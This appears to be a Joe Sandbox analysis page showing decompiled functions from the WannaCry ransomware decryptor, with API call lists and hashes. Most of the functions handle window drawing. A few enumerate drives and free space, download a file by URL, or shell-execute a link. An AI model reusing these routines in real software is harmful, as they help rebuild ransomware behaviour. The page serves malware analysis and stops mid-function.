                                  • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                  • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                  • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                  • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
                                  				signed int _v0;
                                  				char _v4;
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				signed int _t29;
                                  				intOrPtr _t31;
                                  				long _t36;
                                  				intOrPtr _t38;
                                  				intOrPtr* _t41;
                                  				struct HWND__* _t47;
                                  				intOrPtr _t48;
                                  				long _t53;
                                  				struct HWND__* _t58;
                                  				signed int _t60;
                                  				intOrPtr* _t67;
                                  				signed int _t68;
                                  
                                  				_t67 = __ecx;
                                  				L00412FE6();
                                  				_t68 = __eax;
                                  				if((__eax & 0x00008000) != 0) {
                                  					_push( &_v8);
                                  					_push( &_v4);
                                  					L00412FFE();
                                  					if(_a4 == 0) {
                                  						_t60 = _v0;
                                  						_t41 = _v16;
                                  					} else {
                                  						_t58 =  *(__ecx + 0x20);
                                  						_t36 = SendMessageA(_t58, 0x408, 0, 0);
                                  						_t41 = _v16;
                                  						_t53 = _t36;
                                  						if(_t53 == _t41) {
                                  							_t38 =  *((intOrPtr*)(_t67 + 0x68));
                                  							_t58 =  *(_t67 + 0x6c);
                                  							if(_t53 - _t38 < _t58) {
                                  								_t53 = _t58 + _t38;
                                  							}
                                  						}
                                  						asm("cdq");
                                  						_t60 = (_v0 ^ _t58) - _t58 + _t53;
                                  					}
                                  					_t47 =  *(_t67 + 0x6c);
                                  					_t29 = _t47 + _t41;
                                  					if(_t60 <= _t29) {
                                  						if(_t60 >= _t41) {
                                  							InvalidateRect( *(_t67 + 0x20), 0, 1);
                                  						}
                                  					} else {
                                  						_t60 = _t60 + _v12 - _t47 - _t41;
                                  						if(_t60 > _t29) {
                                  							_t60 = _t29;
                                  						}
                                  						_push(0);
                                  						if((_t68 & 0x00004000) == 0) {
                                  							_push(0x4000);
                                  							_push(0);
                                  							L00412DDC();
                                  						} else {
                                  							_push(0);
                                  							_push(0x4000);
                                  							L00412DDC();
                                  						}
                                  					}
                                  					_t48 = _v12;
                                  					_t31 = _t60 -  *(_t67 + 0x6c);
                                  					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
                                  					if(_t31 < _t48) {
                                  						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
                                  					}
                                  					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
                                  					return 1;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}





















                                  APIs
                                  • #3797.MFC42 ref: 00409C27
                                  • #6734.MFC42(?,?), ref: 00409C4E
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                  • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3797#4284#6734MessageSend
                                  • String ID:
                                  • API String ID: 1776784669-0
                                  • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                  • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				void* _v4;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v24;
                                  				void* __ebx;
                                  				intOrPtr* _t21;
                                  				intOrPtr* _t23;
                                  				intOrPtr _t25;
                                  				intOrPtr _t26;
                                  				intOrPtr* _t33;
                                  				signed int _t42;
                                  				unsigned int _t44;
                                  				signed int _t45;
                                  				void* _t53;
                                  				intOrPtr _t65;
                                  				void* _t67;
                                  				intOrPtr _t68;
                                  				void* _t69;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041438B);
                                  				_t21 =  *[fs:0x0];
                                  				_push(_t21);
                                  				 *[fs:0x0] = _t68;
                                  				_push(__ecx);
                                  				_push(0x244);
                                  				L00412CEC();
                                  				_t33 = _t21;
                                  				_t69 = _t68 + 4;
                                  				_v16 = _t33;
                                  				_t53 = 0;
                                  				_v4 = 0;
                                  				if(_t33 == 0) {
                                  					_t33 = 0;
                                  				} else {
                                  					_t65 = _a16;
                                  					 *_t33 = 0;
                                  					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
                                  					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
                                  					 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                  					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
                                  					if(_t65 != 0) {
                                  						asm("repne scasb");
                                  						_t42 =  !(__ecx | 0xffffffff);
                                  						_push(_t42);
                                  						L00412CEC();
                                  						 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                  						asm("repne scasb");
                                  						_t44 =  !(_t42 | 0xffffffff);
                                  						_t67 = _t65 - _t44;
                                  						_t45 = _t44 >> 2;
                                  						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
                                  						_t69 = _t69 + 0x1c;
                                  						_t53 = 0;
                                  					}
                                  				}
                                  				_push(_a12);
                                  				_push(_a8);
                                  				_push(_a4);
                                  				_v4 = 0xffffffff;
                                  				_t23 = E00411C00(_t33);
                                  				 *0x4220dc = _t23;
                                  				if(_t23 == _t53) {
                                  					_push(8);
                                  					L00412CEC();
                                  					 *_t23 = 1;
                                  					 *((intOrPtr*)(_t23 + 4)) = _t33;
                                  					 *[fs:0x0] = _v24;
                                  					return _t23;
                                  				} else {
                                  					if(_t33 != _t53) {
                                  						_t25 =  *((intOrPtr*)(_t33 + 0x138));
                                  						if(_t25 != _t53) {
                                  							_push(_t25);
                                  							L00412C98();
                                  							_t69 = _t69 + 4;
                                  						}
                                  						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
                                  						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
                                  						if(_t26 != _t53) {
                                  							_push(_t26);
                                  							L00412C98();
                                  							_t69 = _t69 + 4;
                                  						}
                                  						_push(_t33);
                                  						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
                                  						L00412C98();
                                  						_t69 = _t69 + 4;
                                  					}
                                  					 *[fs:0x0] = _v24;
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                  • #823.MFC42(?,?,?), ref: 00412849
                                  • #825.MFC42(?), ref: 004128B5
                                  • #825.MFC42(?), ref: 004128CE
                                  • #825.MFC42(00000000), ref: 004128DD
                                  • #823.MFC42(00000008), ref: 004128FA
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825
                                  • String ID:
                                  • API String ID: 89657779-0
                                  • Opcode ID: a8225a914fe684002f5ebb33c6b5a83bf5030d8ce9238fcdcecfe8f5a0f25a9a
                                  • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                  • Opcode Fuzzy Hash: a8225a914fe684002f5ebb33c6b5a83bf5030d8ce9238fcdcecfe8f5a0f25a9a
                                  • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
                                  				intOrPtr _v12;
                                  				void _v259;
                                  				char _v260;
                                  				char _v264;
                                  				char _v284;
                                  				char _t15;
                                  				int _t19;
                                  				CHAR* _t25;
                                  				signed int _t26;
                                  				char* _t40;
                                  
                                  				_t26 = __ecx;
                                  				_t25 = _a4;
                                  				CreateDirectoryA(_t25, 0);
                                  				_t40 = _a8;
                                  				asm("repne scasb");
                                  				if( !(_t26 | 0xffffffff) == 1) {
                                  					L4:
                                  					return 0;
                                  				} else {
                                  					_t15 =  *0x421798; // 0x0
                                  					_v260 = _t15;
                                  					memset( &_v259, 0, 0x40 << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					GetTempFileNameA(_t25, "t", 0,  &_v260);
                                  					_t19 = DeleteUrlCacheEntry(_t40);
                                  					_push(0);
                                  					_push(0);
                                  					_push( &_v264);
                                  					_push(_t40);
                                  					_push(0);
                                  					L004133CE();
                                  					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
                                  						DeleteFileA( &_v284);
                                  						goto L4;
                                  					} else {
                                  						DeleteFileA( &_v284);
                                  						return 1;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000428), ref: 0040B793
                                  • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                  • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                  • DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                  • String ID:
                                  • API String ID: 361195595-0
                                  • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                  • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00409A40(signed int* _a4, intOrPtr _a8) {
                                  				intOrPtr _v4;
                                  				intOrPtr* _v24;
                                  				struct tagRECT _v40;
                                  				intOrPtr _v56;
                                  				intOrPtr _v64;
                                  				char _v68;
                                  				intOrPtr _v88;
                                  				intOrPtr _t34;
                                  				void* _t35;
                                  				void* _t53;
                                  				intOrPtr _t56;
                                  
                                  				 *[fs:0x0] = _t56;
                                  				_v40.right = 0;
                                  				_v40.top = 0x41679c;
                                  				_v4 = 0;
                                  				E00409D40( &(_v40.bottom), _a4, _a8);
                                  				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
                                  				L00412D5E();
                                  				L00413010();
                                  				_t34 =  *_v24;
                                  				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
                                  				L00412D52();
                                  				_v88 = 0x415c00;
                                  				_v56 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v64;
                                  				return _t35;
                                  			}

                                  APIs
                                  • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                  • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                  • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                  • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                  Yara matches
                                  Similarity
                                  • API ID: #2414Rect$#1641#5781CreateOffset
                                  • String ID:
                                  • API String ID: 2675356817-0
                                  • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                  • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E004034A0(void* __ecx) {
                                  				intOrPtr _v0;
                                  				int _v8;
                                  				struct tagRECT _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				intOrPtr _v48;
                                  				intOrPtr _v72;
                                  				char* _t20;
                                  				int _t23;
                                  				void* _t45;
                                  				intOrPtr _t48;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413620);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t48;
                                  				_t45 = __ecx;
                                  				GetClientRect( *(__ecx + 0x20),  &_v28);
                                  				_push( *((intOrPtr*)(_t45 + 0xe8)));
                                  				L00412D76();
                                  				_t20 =  &_v40;
                                  				_push(_t20);
                                  				_v8 = 0;
                                  				L00412D70();
                                  				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                  				_push(_t20);
                                  				L00412D70();
                                  				_v72 = 0x415c00;
                                  				_v40 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v48;
                                  				return _t23;
                                  			}

                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                  • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00406940(void* __ecx) {
                                  				intOrPtr _v0;
                                  				int _v8;
                                  				struct tagRECT _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				intOrPtr _v48;
                                  				intOrPtr _v72;
                                  				char* _t20;
                                  				int _t23;
                                  				void* _t45;
                                  				intOrPtr _t48;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E30);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t48;
                                  				_t45 = __ecx;
                                  				GetClientRect( *(__ecx + 0x20),  &_v28);
                                  				_push( *((intOrPtr*)(_t45 + 0x824)));
                                  				L00412D76();
                                  				_t20 =  &_v40;
                                  				_push(_t20);
                                  				_v8 = 0;
                                  				L00412D70();
                                  				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                  				_push(_t20);
                                  				L00412D70();
                                  				_v72 = 0x415c00;
                                  				_v40 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v48;
                                  				return _t23;
                                  			}

                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                  • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00404EB0(void* __ecx) {
                                  				intOrPtr _v0;
                                  				int _v8;
                                  				struct tagRECT _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				intOrPtr _v48;
                                  				intOrPtr _v72;
                                  				char* _t20;
                                  				int _t23;
                                  				void* _t45;
                                  				intOrPtr _t48;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413870);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t48;
                                  				_t45 = __ecx;
                                  				GetClientRect( *(__ecx + 0x20),  &_v28);
                                  				_push( *((intOrPtr*)(_t45 + 0x6c)));
                                  				L00412D76();
                                  				_t20 =  &_v40;
                                  				_push(_t20);
                                  				_v8 = 0;
                                  				L00412D70();
                                  				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                  				_push(_t20);
                                  				L00412D70();
                                  				_v72 = 0x415c00;
                                  				_v40 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v48;
                                  				return _t23;
                                  			}

                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                  • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00404310(void* __ecx) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v40;
                                  				intOrPtr _v48;
                                  				void* _v96;
                                  				void* _v100;
                                  				void* _v104;
                                  				void* _v108;
                                  				intOrPtr _v112;
                                  				void* _v128;
                                  				void* _v132;
                                  				void* _t20;
                                  				void* _t22;
                                  				void* _t39;
                                  				intOrPtr _t40;
                                  				intOrPtr _t42;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004137A8);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t42;
                                  				_t39 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
                                  					E004044C0(__ecx, 0);
                                  				}
                                  				L00412DD0();
                                  				_t20 = _t39 + 0x48;
                                  				_v8 = 0;
                                  				L00412DCA();
                                  				L00412DC4();
                                  				L00412DBE();
                                  				_t40 =  *((intOrPtr*)(_t39 + 0x40));
                                  				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
                                  				_push(_t20);
                                  				L00412DCA();
                                  				_v40 = 0xffffffff;
                                  				L00412DB8();
                                  				 *[fs:0x0] = _v48;
                                  				return _t22;
                                  			}

                                  APIs
                                  • #470.MFC42(?,00000000), ref: 0040433F
                                  • #5789.MFC42 ref: 00404354
                                  • #5875.MFC42(00000001), ref: 00404361
                                  • #6172.MFC42(?,00000001), ref: 0040436E
                                  • #5789.MFC42(00000000), ref: 0040438F
                                  • #755.MFC42(00000000), ref: 004043A0
                                    • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                    • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                    • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                    • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                    • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                    • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                    • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 3301245081-0
                                  • Opcode ID: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                  • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                  • Opcode Fuzzy Hash: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                  • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
                                  				intOrPtr _t9;
                                  
                                  				_t9 = _a4;
                                  				_push(_t9);
                                  				_push(0x407);
                                  				L00412CE6();
                                  				L00412D88();
                                  				_push(_t9);
                                  				_push(0x408);
                                  				L00412CE6();
                                  				L00412D88();
                                  				_push(_t9);
                                  				_push(2);
                                  				L00412CE6();
                                  				L00412D88();
                                  				return __eax;
                                  			}

                                  APIs
                                  • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                  • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                  • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                  • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                  • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                  • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092
                                  • String ID:
                                  • API String ID: 2547810013-0
                                  • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                  • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403A20(intOrPtr _a4, intOrPtr _a8) {
                                  				union _ULARGE_INTEGER _v8;
                                  				union _ULARGE_INTEGER _v16;
                                  				intOrPtr _v20;
                                  				union _ULARGE_INTEGER _v24;
                                  				short _v28;
                                  				short _v32;
                                  				short _t23;
                                  				short _t34;
                                  				signed int _t47;
                                  				unsigned int _t50;
                                  
                                  				if( *((intOrPtr*)(_a8 + 8)) != 0) {
                                  					return 1;
                                  				} else {
                                  					_t50 = GetLogicalDrives();
                                  					_t47 = 2;
                                  					do {
                                  						if((_t50 >> _t47 & 0x00000001) != 0) {
                                  							_t23 =  *L" : "; // 0x3a0020
                                  							_t34 =  *0x420760; // 0x20
                                  							_v32 = _t23;
                                  							_t7 = _t47 + 0x41; // 0x43
                                  							_v28 = _t34;
                                  							_v32 = _t7;
                                  							_v28 = 0x5c;
                                  							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
                                  								_v28 = 0;
                                  								E004026B0(_a4,  &_v32);
                                  							}
                                  						}
                                  						_t47 = _t47 + 1;
                                  					} while (_t47 <= 0x19);
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  • GetLogicalDrives.KERNEL32 ref: 00403A35
                                  • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                  • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                  • String ID: : $\
                                  • API String ID: 222820107-856521285
                                  • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                  • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00406EF0(void* __ecx, char* _a4, void** _a8) {
                                  				char* _v4;
                                  				char _v8;
                                  				void* _v12;
                                  				char* _t14;
                                  				char _t15;
                                  				char* _t17;
                                  				struct HWND__* _t18;
                                  				char _t23;
                                  
                                  				_t14 = _a4;
                                  				if(_t14[0xc] != 0x201) {
                                  					L5:
                                  					 *_a8 = 0;
                                  					return _t14;
                                  				}
                                  				_t23 = _t14[0x18];
                                  				_t15 = _t14[0x1c];
                                  				_v8 = _t15;
                                  				_t17 = _t15 - _t23 + 1;
                                  				_v12 = _t23;
                                  				_push(_t17);
                                  				L00412CEC();
                                  				_v4 = _t17;
                                  				if(_t17 != 0) {
                                  					_t18 = __ecx + 0x4c0;
                                  					if(_t18 != 0) {
                                  						_t18 =  *(_t18 + 0x20);
                                  					}
                                  					SendMessageA(_t18, 0x44b, 0,  &_v12);
                                  					ShellExecuteA(0, "open", _v4, 0, 0, 5);
                                  					_t14 = _v4;
                                  					_push(_t14);
                                  					L00412C98();
                                  					goto L5;
                                  				}
                                  				return _t17;
                                  			}

                                  APIs
                                  • #823.MFC42(?), ref: 00406F15
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                  • #825.MFC42(?), ref: 00406F62
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825ExecuteMessageSendShell
                                  • String ID: open
                                  • API String ID: 1093558810-2758837156
                                  • Opcode ID: b3555fc8e5306fa9c71381116aefee59a3ba052e6f8451af1c149dcc11f64dcc
                                  • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                  • Opcode Fuzzy Hash: b3555fc8e5306fa9c71381116aefee59a3ba052e6f8451af1c149dcc11f64dcc
                                  • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t30;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004135B3);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t30;
                                  				_push(__ecx);
                                  				_push(_a4);
                                  				_push(0x8a);
                                  				_v16 = __ecx;
                                  				L00412C92();
                                  				_v12 = 0;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
                                  				_v12 = 1;
                                  				L00412C8C();
